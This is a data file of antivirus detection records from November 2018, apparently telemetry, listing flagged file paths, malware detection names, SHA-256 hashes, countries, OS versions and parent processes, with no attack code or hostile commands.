  Row(detection=Row(filename='avscan-20181101-212359-ef7ca5f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212359-EF7CA5F9', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\oyggw4tc2a3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/increment', country='IN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-01T07:14:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094710-1dd02116', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094710-1DD02116', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053161.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0053161.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134447-685641d4', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134413-6E913F09\\AVSCAN-20181101-134447-685641D4', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:14:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102153-e9067c66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6a58198\\AVSCAN-20181101-102035-DF6644A0\\AVSCAN-20181101-102153-E9067C66', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:22:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='btbhsgzd.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BtbhsgZd.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080404-28a476f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4b27230\\AVSCAN-20181101-080204-1A0523EF\\AVSCAN-20181101-080404-28A476F5', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:04:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172936-e4eec5bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172936-E4EEC5BF', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='f436181c218f5a59f9002427d1b651f6a667c2da5abb8f43b5639dfb235e41af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:29:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213704-61683852', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213704-61683852', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccminer.exe', filepath='\\\\?\\D:\\$RECYCLE.BIN\\S-1-5-21-1312461072-2941733865-2679675949-1001\\$RW50CGO\\ccminer-djm34-mod-r1\\ccminer.exe', filesize=61632000, name='HEUR/AGEN.1031883.#M1.#R1'), hash='9d283ec8daef71b6046fdaa78a46501be335d3612b6583f5b8d454529be780c2', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:56:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\avira\\antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-04T11:49:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132945-3c37a492', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb86768b\\AVSCAN-20181104-132930-39128E1E\\AVSCAN-20181104-132945-3C37A492', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:30:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0349629.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0349629.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:26:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130803-08be21ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130803-08BE21AD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\RWK2\\IC2\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='8d438cee0830807ebcea7f041c63b2f7c81f89566fb351d129137ac733e819f7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:07:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-111921-a860a74e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99e0155b\\AVSCAN-20181104-111741-9B8FE081\\AVSCAN-20181104-111921-A860A74E', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='52f99fcbf44511b44e259588d108dd195cbdcc3e629cca0140a65a22aa14bd85', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:19:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\BetssonMPP\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Microgaming\\Poker\\BetssonMPP\\mppoker.exe', parentsize=1289976, timestamp='2018-11-04T00:39:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='installs.exe', filepath='E:\\sw2014x64bit\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='839c19149a37cc63e62db446f80313ca033a58ea062366e999f10769d1aa99b8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:r4btJN+yC0u9FXCE.1', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T04:26:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:31:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='اسطوانة تدمير المواقع.exe', filepath='F:\\010\\اسطوانة تدمير المواقع.exe', filesize=21184000, name='TR/Dropper.MSIL.Gen.#M300.#R5803'), hash='215cd85150dbb518e20a065449b491880fcbd170617d06d31c117d4961dc915c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T21:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eb0159bade25087a7f336578bc68885103480947', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\eb0159bade25087a7f336578bc68885103480947', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='8e714996acb1dbe2cec72130ceadd9fe60cdbf128591304fd5ceff803b67493c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:56:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T16:40:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='E:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='5b732c79191398dfbe9b19c87e319935abd7d721db205828ed9cb5d6e5365bfc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:02:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085530-fa122f16', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-085530-FA122F16', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:55:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185434-7fb940dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_87bd1ed2\\AVSCAN-20181104-185403-7B06C0DE\\AVSCAN-20181104-185434-7FB940DD', filesize=9856000, name='HEUR/AGEN.1008572.#M1.#R1'), hash='7b7a809f1e1ca84e19be5d3b69c7d86f15692ab6f2997189008b819bb4755e4c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:54:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191732-ace64e04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22272012\\AVSCAN-20181104-191409-83B7AC4F\\AVSCAN-20181104-191732-ACE64E04', filesize=84000, name='Adware/Agent.84000.#M1.#R1'), hash='41fbd72fb3818e8e6c7f8237591c3b17098ac11c70fb3c76ba765bb7d6321645', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:17:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130648-03229575', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130648-03229575', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='readme.html', filepath='G:\\.BACKUP FOLDER\\GAMES\\feeding frenzy 2 deluxe\\readme.html', filesize=284000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='43071bb620d77d819b1ee36636e4d8094a6092e32132bd3d2c7a576c97bcd848', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T04:14:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1f0f8450.exe', filepath='C:\\programdata\\{b2b054cf-4e79-e7da-28ad-06720d3b5471}\\1f0f8450.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='7de1621fbf1c889c2c0390486dabe9c1bbd63e8fd93bb564ff086324d9f9f8f6', metadata=Row(cmdline=None, country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:05:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193233-2507accc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68857b21\\AVSCAN-20181104-193156-2184D282\\AVSCAN-20181104-193233-2507ACCC', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:32:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Program Files\\Fineout Technology\\EZNANO\\Resources\\nvidia\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:28:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130537-fdc193d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130537-FDC193D7', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_75618ca379b78941\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6c6b43dcd0d1b9f98a2179a07f3d9e560faac83985a3f56b4dea261213c11c85', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:03:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B99B1D8CE44ADB3D7693907B7672DDC28E0AEEE2D1F3FA7894AA642EB9896999', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b99b1d8ce44adb3d7693907b7672ddc28e0aeee2d1f3fa7894aa642eb9896999', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:54:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140234-efb581b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140234-EFB581B4', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:00:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183451-9ebf323b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63092902\\AVSCAN-20181104-183056-86173276\\AVSCAN-20181104-183451-9EBF323B', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:34:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:14:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f22638348.dll', filepath='\\\\?\\C:\\Users\\X\\Downloads\\testdisk-7.0.win\\testdisk-7.0\\recup_dir.133\\f22638348.dll', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='91a36f37898cccb019cf639370db5a550c6785b6433c34bac1e71a832a23dc93', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211052-64357dc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8042744\\AVSCAN-20181104-204911-B6642F9B\\AVSCAN-20181104-211052-64357DC8', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:40:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008f30e', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008f30e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dtsu2pausrv32.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\drp\\DP_Audio_wnt6-x86_1111\\drp\\x86\\S\\Realtek\\2\\DTSU2PAuSrv32.exe', filesize=256000, name='W32/Sality.AG.#M1.#R1'), hash='9747165e934ea35cceeff9e433b43095b25b52a5842a96643eaba52e88b70fc0', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T15:03:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='toolregistrysearch.exe', filepath='C:\\Program Files (x86)\\WinUtilities\\ToolRegistrySearch.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='8489184fb747ef927b1e1f587a634b75a3d3c4e51cce1db6dc16897205bec744', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\WiseRegistryCleaner\\Activator.exe', parentsize=684032, timestamp='2018-11-04T21:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2016-03-17_19-11-18 [spam_96%] [virencheck_ riskanter anhang] fw_ paym.eml', filepath='\\\\?\\C:\\Windows\\CSC\\v2.0.6\\namespace\\FILE101\\USER\\StefanW\\Sicherung_EDV123W8\\Desktop\\2016-03-17\\2016-03-17_19-11-18 [SPAM_96%] [Virencheck_ riskanter Anhang] FW_ Paym.eml', filesize=20000, name='HTML/ExpKit.Gen6.#M1.#R1'), hash='bd3100afd776a0abf6212472ec49275e591ba2d63a39b6c6048178f67b074bdc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:36:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\D:\\Games\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:56:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:39:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='getdatantfs.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\GETDATANTFS.exe', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000122b', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000122b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T15:49:20Z'), dt=datetime.date(2018, 11, 4)),
